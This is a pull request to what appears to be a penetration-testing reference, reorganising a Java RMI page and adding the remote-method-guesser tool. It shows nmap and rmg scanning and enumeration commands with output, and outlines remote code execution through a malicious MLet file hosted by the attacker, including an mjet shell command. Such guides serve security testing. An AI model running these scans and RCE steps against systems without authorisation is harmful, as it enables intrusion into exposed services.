### PR TITLE
Java RMI: Add remote-method-guesser to tools

### DIFF
--- a/Java RMI/README.md
+++ b/Java RMI/README.md
@@ -1,25 +1,27 @@
 # Java RMI
 
-> The attacker can host a MLet file and instruct the JMX service to load MBeans from the remote host. 
+> Exposing a weak configured Java Remote Method Invocation (RMI) service can lead to several ways to achieve RCE.
+> One such attack is to host an MLet file and instruct the JMX service to load MBeans from the remote host which can be carried out
+> using the tools mjet or sjet. remote-method-guesser is a more recent tool which bundles enumeration of RMI services together
+> with a summary of currently known attack techniques.
 
 ## Summary
 
+* [Tools](#tools)
+* [Detection](#detection)
 * [Exploitation](#exploitation)
-    * [Requirements](#requirements)
-    * [Detection](#detection)
-    * [Remote Command Execution](#remote-command-execution)
+  * [RCE using sjet/mjet](#rce-using-sjet-or-mjet)
 * [References](#references)
 
-## Exploitation
+## Tools
 
-### Requirements
-- Jython
-- The JMX server can connect to a http service that is controlled by the attacker
-- JMX authentication is not enabled
+- [sjet](https://github.com/siberas/sjet)
+- [mjet](https://github.com/mogwailabs/mjet)
+- [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
 
+## Detection
 
-### Detection
-
+Using [nmap](https://nmap.org/):
 ```powershell
 $ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v
 1089/tcp open  java-rmi Java RMI
@@ -33,7 +35,45 @@ $ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TA
 |     javax.management.remote.rmi.RMIServerImpl_Stub
 ```
 
-### Remote Command Execution
+Using [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser):
+```bash
+$ rmg scan 172.17.0.2 --ports 0-65535
+[+] Scanning 6225 Ports on 172.17.0.2 for RMI services.
+[+]
+[+] 	[HIT] Found RMI service(s) on 172.17.0.2:40393 (DGC)
+[+] 	[HIT] Found RMI service(s) on 172.17.0.2:1090  (Registry, DGC)
+[+] 	[HIT] Found RMI service(s) on 172.17.0.2:9010  (Registry, Activator, DGC)
+[+] 	[6234 / 6234] [#############################] 100%
+[+]
+[+] Portscan finished.
+```
+
+```bash
+$ rmg enum 172.17.0.2 9010
+[+] RMI registry bound names:
+[+]
+[+] 	- plain-server2
+[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
+[+] 		    Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711]
+[+] 	- legacy-service
+[+] 		--> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
+[+] 		    Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309]
+[+] 	- plain-server
+[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
+[+] 		    Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813]
+[...]
+```
+
+## Exploitation
+
+### RCE using sjet or mjet
+
+#### Requirements
+- Jython
+- The JMX server can connect to a http service that is controlled by the attacker
+- JMX authentication is not enabled
+
+#### Remote Command Execution
 
 The attack involves the following steps:
 * Starting a web server that hosts the MLet and a JAR file with the malicious MBeans
@@ -59,5 +99,6 @@ jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
 
 ## References
 
-* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH - 28 APR 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
-* [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security - 26th March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf)
+* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH, 28 April 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
+* [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security, 26 March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf)
+* [remote-method-guesser - BHUSA 2021 Arsenal - Tobias Neitzel, 15 August 2021](https://www.slideshare.net/TobiasNeitzel/remotemethodguesser-bhusa2021-arsenal)


### PR DESCRIPTION
This PR will add remote-method-guesser as tool. I also changed the overall structure of the previous article keeping most of the content but adjusting it to the layout mentioned in CONTRIBUTION.md

I thing rmg is a great addition to the landscape of RMI exploitation and definitely belongs to the article. Let me know if you have any objections or prefer other changes.